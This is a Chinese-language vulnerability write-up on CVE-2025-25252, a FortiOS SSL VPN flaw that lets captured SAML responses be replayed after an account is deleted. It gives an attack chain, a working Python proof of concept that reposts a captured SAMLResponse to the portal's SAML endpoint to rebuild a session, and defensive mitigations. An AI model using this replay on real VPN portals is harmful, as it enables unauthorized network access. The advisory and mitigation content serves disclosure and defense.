CVE-2025-25252 FortiOS SSL VPN会话过期不足漏洞

漏洞信息

漏洞编号

CVE-2025-25252

漏洞类型

会话过期不足 (Insufficient Session Expiration)

CVSS评分

4.8 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Fortinet FortiOS SSL VPN

漏洞概述

CVE-2025-25252是Fortinet FortiOS SSL VPN中存在的一个会话过期不足漏洞（Insufficient Session Expiration），对应CWE-613。该漏洞影响FortiOS SSL VPN的多个版本，包括7.6.0至7.6.2、7.4.0至7.4.6、7.2.0至7.2.10、7.0.0至7.0.16以及6.4全系列版本。

该漏洞的核心问题在于FortiOS SSL VPN在处理SAML（Security Assertion Markup Language）会话记录时，未能正确实施会话过期机制。具体而言，当用户（尤其是管理员用户）的账户被删除且其当前会话被终止后，系统未能使与该用户关联的SAML记录失效。攻击者如果事先获取了这些SAML记录（例如通过中间人攻击、日志泄露、内存取证或其他途径），则可以在账户被删除后仍然通过重用这些SAML记录来访问或重新打开已终止的会话。

此漏洞的危害场景特别针对前管理员账户。即使前管理员的账户已被系统管理员移除，并且其当前活动会话已被强制终止，攻击者仍然可以通过重用之前截获的SAML响应/断言来重新建立有效的VPN会话，从而绕过身份验证机制。这对组织的安全管理构成严重威胁，尤其是在员工离职、权限变更或账户被怀疑泄露后的清理过程中。

该漏洞的CVSS 3.1评分为4.8，属于中危级别。攻击向量为网络（AV:N），攻击复杂度较高（AC:H），无需权限（PR:N），无需用户交互（UI:N），对机密性影响为低（C:L），对完整性影响为低（I:L），对可用性影响为无（A:N）。虽然评分为中危，但由于其针对的是管理员会话且涉及身份验证绕过，因此在实际安全运维中应予以高度重视。

Fortinet官方已发布安全公告FG-IR-24-487，建议受影响的用户尽快升级到修复版本以消除此安全风险。

技术细节

该漏洞的技术根源在于FortiOS SSL VPN的SAML单点登录（SSO）会话管理机制存在缺陷。在正常的SAML认证流程中，用户通过身份提供商（IdP）进行认证后，IdP会生成一个SAML断言（Assertion），该断言包含用户的身份信息和认证上下文。FortiOS SSL VPN作为服务提供商（SP）接收并验证该断言后，会创建本地会话并授予用户访问权限。

漏洞的关键问题在于会话生命周期管理：
1. 当管理员账户被删除时，系统虽然终止了当前的VPN会话，但未使与之关联的SAML记录（如SAML响应中的RelayState、SessionIndex等参数）失效或加入黑名单。
2. SAML记录本身可能仍然包含有效的数字签名和未过期的认证声明。
3. 攻击者在获取这些SAML记录后，可以通过重新提交（replay）这些记录来欺骗SSL VPN门户，使其认为这是一个新的合法认证请求。
4. 由于会话过期检查不充分，系统会基于旧的SAML记录创建新的会话，从而授予攻击者访问权限。

利用方式：攻击者需要首先获取目标用户的SAML记录，这可以通过多种途径实现，包括但不限于网络嗅探（若TLS配置不当）、浏览器内存转储、客户端日志分析、社会工程学等。获取SAML记录后，攻击者只需在账户被删除后重新提交该SAML响应，即可绕过身份验证重新建立会话。整个攻击过程无需用户交互，且可远程执行。

攻击链分析

STEP 1

步骤1：信息收集与SAML记录获取

攻击者通过各种途径（如网络嗅探、客户端日志分析、浏览器内存取证、社会工程学等）获取目标用户（特别是前管理员）的SAML响应记录。SAML记录通常包含SAMLResponse、RelayState等参数，可能在TLS解密后的网络流量中泄露。

STEP 2

步骤2：账户删除与会话终止

目标组织的安全管理员发现风险后，删除该用户/管理员的账户，并强制终止其当前活动会话。在正常情况下，这应该使所有相关会话凭证失效。

STEP 3

步骤3：SAML记录重放攻击

由于FortiOS SSL VPN存在会话过期不足漏洞（CWE-613），系统未能将已删除账户的SAML记录加入失效列表。攻击者将之前捕获的SAML响应重新提交到SSL VPN的SAML消费端点（通常为 /remote/saml/login/）。

STEP 4

步骤4：会话重建与权限获取

FortiOS SSL VPN验证SAML响应的数字签名（签名本身仍然有效），由于会话过期检查不充分，系统基于旧的SAML记录创建新的VPN会话，授予攻击者与原用户相同的访问权限。

STEP 5

步骤5：内部网络渗透

攻击者利用重建的VPN会话访问内部网络资源。如果获得的是管理员权限，则可进一步控制系统配置、网络设置或敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-25252 PoC - FortiOS SSL VPN SAML Session Reuse
# This PoC demonstrates the concept of SAML record reuse attack
# against FortiOS SSL VPN with insufficient session expiration.

import requests
import base64
import urllib.parse
import re
from typing import Optional

class FortiOSSSLVPNExploit:
    """
    PoC for CVE-2025-25252: Insufficient Session Expiration in FortiOS SSL VPN
    Allows reuse of SAML records to re-open terminated sessions.
    """

    def __init__(self, target_url: str, saml_record: str):
        """
        Initialize the exploit.
        :param target_url: FortiOS SSL VPN portal URL (e.g., https://victim.com/remote/login)
        :param saml_record: Base64-encoded SAML response captured previously
        """
        self.target_url = target_url.rstrip('/')
        self.saml_record = saml_record
        self.session = requests.Session()

    def decode_saml(self) -> dict:
        """Decode the base64 SAML response and extract key fields."""
        try:
            decoded = base64.b64decode(self.saml_record).decode('utf-8', errors='ignore')
            # Extract SessionIndex, NameID, and NotOnOrAfter fields
            session_index = re.search(r'SessionIndex="([^"]+)"', decoded)
            name_id = re.search(r'<saml:NameID[^>]*>([^<]+)</saml:NameID>', decoded)
            not_on_or_after = re.search(r'NotOnOrAfter="([^"]+)"', decoded)
            return {
                'raw': decoded,
                'session_index': session_index.group(1) if session_index else None,
                'name_id': name_id.group(1) if name_id else None,
                'not_on_or_after': not_on_or_after.group(1) if not_on_or_after else None
            }
        except Exception as e:
            print(f"[ERROR] Failed to decode SAML record: {e}")
            return {}

    def submit_saml_response(self) -> Optional[requests.Response]:
        """
        Submit the captured SAML response to the FortiOS SSL VPN portal
        to re-establish a session using the previously captured SAML record.
        """
        saml_info = self.decode_saml()
        if not saml_info.get('raw'):
            print("[ERROR] Invalid SAML record provided.")
            return None

        print(f"[*] Target: {self.target_url}")
        print(f"[*] Session Index: {saml_info.get('session_index')}")
        print(f"[*] NameID: {saml_info.get('name_id')}")
        print(f"[*] Original NotOnOrAfter: {saml_info.get('not_on_or_after')}")

        # Step 1: Get the SAML login page to obtain any CSRF tokens or cookies
        login_url = f"{self.target_url}/remote/saml/login/"
        try:
            resp = self.session.get(login_url, timeout=10, verify=False)
            print(f"[*] GET {login_url} -> {resp.status_code}")
        except Exception as e:
            print(f"[ERROR] Cannot reach target: {e}")
            return None

        # Step 2: Submit the SAML response (SAML POST binding)
        saml_post_url = f"{self.target_url}/remote/saml/login/?acs"
        post_data = {
            'SAMLResponse': self.saml_record,
            'RelayState': '/remote/login'
        }

        print(f"[*] Submitting captured SAML record to {saml_post_url}")
        try:
            resp = self.session.post(
                saml_post_url,
                data=post_data,
                timeout=10,
                verify=False,
                allow_redirects=False
            )
            print(f"[*] POST response status: {resp.status_code}")

            # Check if session was re-established
            if resp.status_code in (302, 303) or 'SVPNCOOKIE' in self.session.cookies.get_dict():
                print("[+] SUCCESS: Session re-established via SAML record reuse!")
                print(f"[+] Session cookies: {self.session.cookies.get_dict()}")
                return resp
            else:
                print("[-] Session re-establishment may have failed.")
                return resp
        except Exception as e:
            print(f"[ERROR] Failed to submit SAML response: {e}")
            return None

    def verify_session(self) -> bool:
        """Verify if the re-established session is valid by accessing VPN portal."""
        portal_url = f"{self.target_url}/remote/login"
        try:
            resp = self.session.get(portal_url, timeout=10, verify=False)
            if 'SVPNCOOKIE' in self.session.cookies.get_dict() or resp.status_code == 200:
                print("[+] Session is valid. VPN portal accessible.")
                return True
            print("[-] Session verification failed.")
            return False
        except Exception as e:
            print(f"[ERROR] Session verification error: {e}")
            return False


def main():
    # Example usage - replace with actual target and captured SAML record
    TARGET = "https://fortigate-victim.example.com"
    # SAML record should be captured from a previous legitimate session
    # This is a placeholder base64-encoded SAML response
    SAML_RECORD = "PHNhbWxwOlJlc3BvbnNlIHhtbG5zOnNhbWxwPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6cHJvdG9jb2wiIHhtbG5zOnNhbWw9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDphc3NlcnRpb24iPjwvc2FtbHA6UmVzcG9uc2U+"

    print("=" * 60)
    print("CVE-2025-25252 - FortiOS SSL VPN SAML Session Reuse PoC")
    print("=" * 60)

    exploit = FortiOSSSLVPNExploit(TARGET, SAML_RECORD)
    result = exploit.submit_saml_response()

    if result and result.status_code in (302, 303, 200):
        exploit.verify_session()


if __name__ == "__main__":
    # Suppress SSL warnings for PoC purposes
    import urllib3
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    main()

影响范围

FortiOS 7.6.0 - 7.6.2

FortiOS 7.4.0 - 7.4.6

FortiOS 7.2.0 - 7.2.10

FortiOS 7.0.0 - 7.0.16

FortiOS 6.4 全版本

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）强制轮换所有SAML签名证书，使攻击者持有的旧SAML记录失效；2）在身份提供商（IdP）端启用SAML OneTimeUse条件，限制每个断言仅能使用一次；3）缩短SAML断言的有效期至最短可能时间；4）对所有VPN用户（尤其是管理员）强制启用多因素认证；5）密切监控SSL VPN的认证日志，识别异常的SAML认证模式；6）限制SSL VPN门户的源IP地址，仅允许可信网络访问；7）考虑临时禁用SAML SSO认证，切换回本地认证方式。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-25252
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-25252
3 Details https://www.cvedetails.com/cve/CVE-2025-25252/
4 VulDB https://vuldb.com/cve/CVE-2025-25252
5 Link https://fortiguard.fortinet.com/psirt/FG-IR-24-487